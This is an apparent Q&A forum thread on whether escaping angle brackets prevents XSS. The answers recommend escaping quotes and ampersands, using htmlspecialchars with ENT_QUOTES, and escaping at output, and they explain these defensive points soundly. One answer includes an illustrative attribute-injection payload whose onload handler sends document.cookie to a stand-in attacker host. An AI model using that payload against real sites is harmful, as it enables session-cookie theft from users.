tags:

views:

467

answers:

2
+8  Q: 

Is replacing : < and > with &lt; and &gt; enough to prevent XSS injection?

I want to know if entiting the two marks < and > is enough to prevent XSS injections?

And if not, why? And what's the best solution?

+10  A: 

It depends very much on context.

Check out this example, from a typical forum site...

You may hotlink your avatar image. Enter the full URL.

Malicious user enters in input field

http://www.example.com/image.png" onload="window.location = 'http://www.bad.com/giveme.php?cookie=' + encodeURI(document.cookie)

There is no encoding there of less than and greater than, but still a big security hole.

With htmlspecialchars(), I found it a good idea to make (or use) a wrapper function of it that casts to a string, provides an easier way to disable double encoding and to ensure it is using the correct character set of your application. Kohana has a great example.

alex  2010-01-22 00:09:42
hi, thanks all for answers, i asked this because i think entiting all characters takes more space in database. thanks
David  2010-01-22 00:20:55
I wouldn't encode going into the db, but encode coming out. It's generally a good idea to store user data "as is", and provide some mechanism to make it safe on display.
alex  2010-01-22 00:22:49
bobince  2010-01-22 01:18:19
The general rule is do input validation when receiving data, and output escaping when you are outputting data. See the OWASP XSS Prevention Cheat Sheet for how to escape in different contexts: http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Erlend  2010-01-31 11:11:55
+2  A: 

You should also take doublequotes ", singlequotes ' and ampersands & into account. If you do that all during displaying/generating the output, then yes, it's enough.

You should only ensure that you do this for any user-controlled input, such as request parameters, request URL, request headers and user-controlled input which is been stored in a datastore.

In PHP you can do that with htmlspecialchars() and in JSP cou can do that with JSTL <c:out>.

BalusC  2010-01-22 00:11:58
Note `htmlspecialchars` by default escapes only the doublequote, not the single. But that's usually OK, as it's quite rare to use the single quote as an attribute delimiter. Use `ENT_QUOTES` to be sure of getting both.
bobince  2010-01-22 01:13:40

related questions

Why does this remote script cause IE6 to hang?
HTTP input filter like mod_security for WebSphere?
Should I sanitize HTML markup for a hosted CMS?
HTML/Javascript app that runs on the filesystem, security issue
Gracefully closing a frame (toolbar) around an iframe
What's the best method for sanitizing user input with PHP?
How do you htmlencode using html agility pack?
XSS Blacklist - Is anyone aware of a reasonable one?
Do htmlspecialchars and mysql_real_escape_string keep my PHP code safe from injection?
What percentage of my time will be spent in user input verfication during web development?
How do you allow the usage of an <img> while preventing XSS?
What are the best practices for avoid xss attacks in a PHP site
How do use fckEditor safely, without risk of cross site scripting?
Will HTML Encoding prevent all kinds of XSS attacks?
Inform potential clients about security vulnerabilities?
Best Practice: Legitimate Cross-Site Scripting
Access to restricted URI denied code: 1012
How do you set up use HttpOnly cookies in PHP
When is it Best to Sanitize User Input?
How exactly do you configure httpOnlyCookies in ASP.NET?
How do you configure HttpOnly cookies in tomcat / java webapps?
Communicating between websites (using Javascript or ?)
Best regex to catch XSS (Cross-site Scripting) attack (in Java)?
Sanitising user input using Python
Catching SQL Injection and other Malicious Web Requests